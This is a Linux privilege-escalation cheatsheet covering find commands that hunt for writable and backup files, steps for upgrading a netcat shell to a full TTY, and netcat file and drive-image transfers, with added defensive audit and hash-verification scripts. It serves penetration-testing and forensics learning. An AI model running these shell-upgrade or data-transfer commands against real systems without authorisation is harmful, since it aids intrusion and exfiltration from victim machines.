Linux Privilege Escalation

A cheatsheet containing a collection of useful commands.

Searching

Look for files with the extension .bak:

find / -name "*.bak" -ls 2>&1 | grep -v "Permission denied"

Look for writable files and directories:

find / -writable -ls 2>&1 | grep -v "Permission denied"

Look for dotfiles:

find / -name ".*" -ls 2>&1 | grep -v "Permission denied"

Look for files and directories owned by a specific user, pruning a few system folders and filtering out "Permission denied" output:

find / -regextype posix-extended -regex "/(sys|srv|proc|run)" -prune -o -user <username> -ls 2>&1 | grep -v "Permission denied"
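The searches above list everything writable by the current user, which on a live box includes a flood of entries under /proc, /sys and /dev. The following is an added example, not part of the original cheatsheet: a portable variant that takes the root to scan as an argument, prunes the kernel pseudo filesystems, and reports what a hardening audit actually cares about, world-writable files and world-writable directories without the sticky bit. It uses the POSIX -perm -0002 test instead of the GNU-only -writable, and 2>/dev/null in place of the 2>&1 | grep -v trick. The function names and the constructed test tree are my own.

```shell
#!/bin/sh
# Added example (not from the original cheatsheet). Portable world-writable
# scan with the noisy pseudo filesystems pruned. $1 is the root to scan, so
# the same functions can be pointed at / on a real host or at a test tree.

# List world-writable regular files under $1.
world_writable_files() {
    find "$1" \( -path "$1/proc" -o -path "$1/sys" -o -path "$1/run" -o -path "$1/dev" \) -prune \
         -o -type f -perm -0002 -print 2>/dev/null
}

# List world-writable directories under $1 that lack the sticky bit, i.e.
# places where any user can delete or replace another user's files.
world_writable_dirs_nosticky() {
    find "$1" \( -path "$1/proc" -o -path "$1/sys" -o -path "$1/run" -o -path "$1/dev" \) -prune \
         -o -type d -perm -0002 ! -perm -1000 -print 2>/dev/null
}

# Self-check on a constructed tree in a temp dir: one loose file, one normal
# file, one file under a pruned path, one /tmp-style sticky dir and one
# non-sticky open dir. Returns 0 only if exactly the expected entries show up.
demo_world_writable() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/etc" "$root/tmp" "$root/open" "$root/proc"
    : > "$root/etc/app.conf";   chmod 0644 "$root/etc/app.conf"
    : > "$root/etc/loose.conf"; chmod 0666 "$root/etc/loose.conf"
    : > "$root/proc/fake";      chmod 0666 "$root/proc/fake"   # pruned, must not appear
    chmod 1777 "$root/tmp"
    chmod 0777 "$root/open"
    files=$(world_writable_files "$root")
    dirs=$(world_writable_dirs_nosticky "$root")
    [ "$files" = "$root/etc/loose.conf" ] && [ "$dirs" = "$root/open" ]
}
```

Run it against a real system with world_writable_files / and world_writable_dirs_nosticky /; anything outside the expected sticky directories (/tmp, /var/tmp, /dev/shm) is worth a second look, whichever side of the engagement you are on.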

Upgrade Shell

Helpful commands to get you out of raw execution hell via netcat!

Spawn TTY

Choose python or python3, depending on what's available:

python -c 'import pty;pty.spawn("/bin/bash")'

Tab Completion

Drop out of netcat session by pressing these keys:

Ctrl+Z

In your local commandline type:

stty raw -echo

Foreground the netcat shell by typing the following twice:

fg +

Clear Screen

To be able to clear the screen (and otherwise clean up your mess), type the following commands.

In the local commandline type:

echo $TERM

You should get output like screen, dumb, etc.

In the netcat shell type:

export TERM=screen

Reinitialize Terminal

In the netcat shell type:

reset

If you receive the output:

reset: unknown terminal type unknown
Terminal type?

Enter the output from echo $TERM.

History

To review the mess you have made, enable command history.

In the netcat shell type:

export SHELL=bash

Enlarge Screen

Make your local terminal the size you like it. Then type:

stty size

Take the two numbers printed (rows, columns) and use them in the following command in the netcat shell:

stty rows 42 cols 188

Transfers With Netcat

We can transfer files quite easily with netcat. This can be very useful both for pentesting and forensic investigations where we would want to avoid writing to the victim system. The good thing about netcat is that the commands are short and sweet.

Basic Send & Receive

On the receiving end run the command:

nc -l -p 1234 > out.file

On the sending end run the command:

nc -w 3 <destination> 1234 < out.file

Compressed Transfers

You can compress larger files for a faster transfer if compress/uncompress and tar are available on both ends.

On the receiving end run the command:

nc -l -p 1234 | uncompress -c | tar xvfp -

On the sending end run the command:

tar cfp - /some/dir | compress -c | nc -w 3 <destination> 1234

Forensic Image Transfer

By combining dd with netcat we can transfer an image of a drive on the fly, without writing anything to the machine holding the drive. Note that the roles are reversed compared to the examples above: the sending end listens and the receiving end connects, so <destination> here is the address of the machine holding the drive.

On the receiving end run the command (pv -b only shows a byte count and can be dropped if pv is not installed):

nc <destination> 1234 | pv -b > hda1.img.gz

On the sending end run the command:

dd if=/dev/hda1 | gzip -9 | nc -l 1234
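An image you cannot verify is of little use in a forensic context. The following is an added example, not part of the original cheatsheet: the dd | gzip | nc pipeline wrapped so the source is hashed before it is imaged and the received image is hashed again after decompression. The transport is passed in as trailing arguments, so the same functions work with the cheatsheet's nc commands or, for the self-check, with a plain cat through a pipe. The function names, the bs=64k block size and <destination> are my own choices.

```shell
#!/bin/sh
# Added example (not from the original cheatsheet): verifiable dd | gzip | nc
# image transfer. Hash the source first, send the compressed stream, hash the
# decompressed image on arrival and compare.

# Print the SHA-256 of a block device or file.
hash_source() {
    sha256sum "$1" | cut -d ' ' -f 1
}

# Sending end. $1 = device or file to image, remaining args = transport
# command that reads the compressed stream on stdin, e.g.
#   send_image /dev/hda1 nc -l 1234              (sender listens, as on the page)
#   send_image /dev/hda1 nc -w 3 <destination> 1234
# Records the source hash in <basename>.sha256 in the current directory.
send_image() {
    src=$1; shift
    hash_source "$src" > "$(basename "$src").sha256" || return 1
    dd if="$src" bs=64k 2>/dev/null | gzip -9 | "$@"
}

# Receiving end. $1 = output file, remaining args = transport command that
# writes the stream to stdout, e.g.
#   receive_image hda1.img.gz nc <destination> 1234
# Use sh -c '...' if you want a pipeline such as nc ... | pv -b as transport.
receive_image() {
    out=$1; shift
    "$@" > "$out"
}

# Compare the decompressed image against the hash recorded at the source.
# Returns 0 on match, 1 otherwise.
verify_image() {
    actual=$(gzip -dc "$1" | sha256sum | cut -d ' ' -f 1)
    [ "$actual" = "$2" ]
}

# Self-check: a constructed 64 KiB random file stands in for the drive and a
# pipe stands in for the network. Returns 0 only if the good image verifies
# and a wrong hash is rejected.
demo_image_transfer() {
    work=$(mktemp -d) || return 1
    head -c 65536 /dev/urandom > "$work/disk.bin"
    ( cd "$work" && send_image disk.bin sh -c 'cat > disk.img.gz' ) || return 1
    verify_image "$work/disk.img.gz" "$(cat "$work/disk.bin.sha256")" || return 1
    if verify_image "$work/disk.img.gz" 0000000000000000000000000000000000000000000000000000000000000000; then
        return 1
    fi
    return 0
}
```

Keep the .sha256 file with the case notes; hashing the source does read the device a second time, which is the usual price of an image you can stand behind.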